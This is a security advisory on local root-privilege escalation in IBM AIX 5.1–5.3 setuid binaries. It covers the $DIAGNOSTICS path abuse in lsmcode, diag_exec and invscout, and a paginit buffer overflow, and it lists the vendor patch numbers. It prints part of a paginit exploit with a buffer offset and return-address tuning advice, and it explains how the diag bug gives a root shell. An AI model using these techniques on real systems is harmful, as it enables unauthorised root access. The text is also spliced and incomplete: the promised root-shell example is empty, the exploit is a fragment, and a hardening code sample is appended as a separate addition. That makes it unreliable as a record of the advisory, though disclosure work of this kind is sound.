The following exploit code can be used to test your system for the vulnerabilities in paginit, lsmcode and invscout that we partly reported on in our previous advisory: IBM AIX invscout Local Command Execution Vulnerability.
Credit:
The information has been provided by cees-bart.
Vulnerable Systems:
* IBM's AIX versions 5.1, 5.2 and 5.3
Solution:
The vendor has been contacted and has released the following patches:
1) For the diag bug, bugfix numbers are IY64389(5.1), IY64523(5.2), and IY64277(5.3).
2) For the paginit bug, bugfix numbers are IY64358(5.1), IY64522(5.2), and IY64312(5.3).
Diag vulnerability:
There are (at least) 4 broken suid binaries:
-r-sr-xr-x 1 root system 10014 Sep 16 2002 /usr/sbin/lsmcode
-r-sr-x--- 1 root system 2796 Jan 26 2003 /usr/sbin/diag_exec
-r-sr-xr-x 1 root system 450433 Apr 08 2004 /usr/sbin/invscout
-r-sr-xr-x 1 root system 511362 Apr 08 2004 /usr/sbin/invscoutd
All these binaries are exploited the same way: each takes the path set in the $DIAGNOSTICS environment variable and executes $DIAGNOSTICS/bin/Dctrl as root.
Example:
Executing the following gives a root shell:
Paginit vulnerability:
The following setuid binary:
-r-sr-xr-x 1 root security 7354 Mar 12 2003 /usr/bin/paginit
Does not do a bounds check on the first command-line argument, which is supposed to be a username. If you feed paginit the proper data and hit enter, root privileges are gained.
Exploit:
/* exploit for /usr/bin/paginit
tested on: AIX 5.2
if the exploit fails it's because the shellcode
ends up at a different address. use dbx to check,
and change RETADDR accordingly.
*/
p = buf;
p += 4114;
printint(p,RETADDR); // try to hit the landingzone
p += 72;
printint(p, RETADDR); // any readable address (apparently not overwritten)
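As an added example (not IBM's code and not part of this advisory), the two rules a setuid helper must follow to avoid the two bug classes described above: never trust $DIAGNOSTICS while running with elevated privileges, and bounds-check the username argument before copying it. The default diagnostics directory and the 8-character name limit are assumptions, not values from the advisory.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Assumed values: the real diag install directory and the username
 * limit of a given AIX level may differ. */
#define DEFAULT_DIAG_DIR "/usr/lpp/diagnostics"
#define MAX_USERNAME     8

/* Diag bug pattern. The vulnerable binaries built "$DIAGNOSTICS/bin/Dctrl"
 * from the environment and ran it as root. Hardened rule: when privileged
 * (caller passes getuid() != geteuid()), the environment is ignored and the
 * compiled-in default is used; otherwise only an absolute path without ".."
 * is accepted. Returns 0, or -1 if the result would not fit in out. */
int resolve_dctrl_path(const char *env_value, int privileged,
                       char *out, size_t outlen)
{
    const char *dir = DEFAULT_DIAG_DIR;
    if (!privileged && env_value != NULL && env_value[0] == '/' &&
        strstr(env_value, "..") == NULL)
        dir = env_value;
    int n = snprintf(out, outlen, "%s/bin/Dctrl", dir);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Paginit bug pattern. The first argument was copied into a fixed buffer
 * with no bounds check. Here the length is checked against both the policy
 * limit and the destination size before anything is copied, and the
 * character set is restricted to what a user name may contain. */
int copy_username(const char *arg, char *out, size_t outlen)
{
    size_t len = strlen(arg);
    if (len == 0 || len > MAX_USERNAME || len >= outlen)
        return -1;                       /* reject empty or over-long names */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (!isalnum(c) && c != '_' && c != '-' && c != '.')
            return -1;                   /* reject shell or control characters */
    }
    memcpy(out, arg, len);
    out[len] = '\0';
    return 0;
}
```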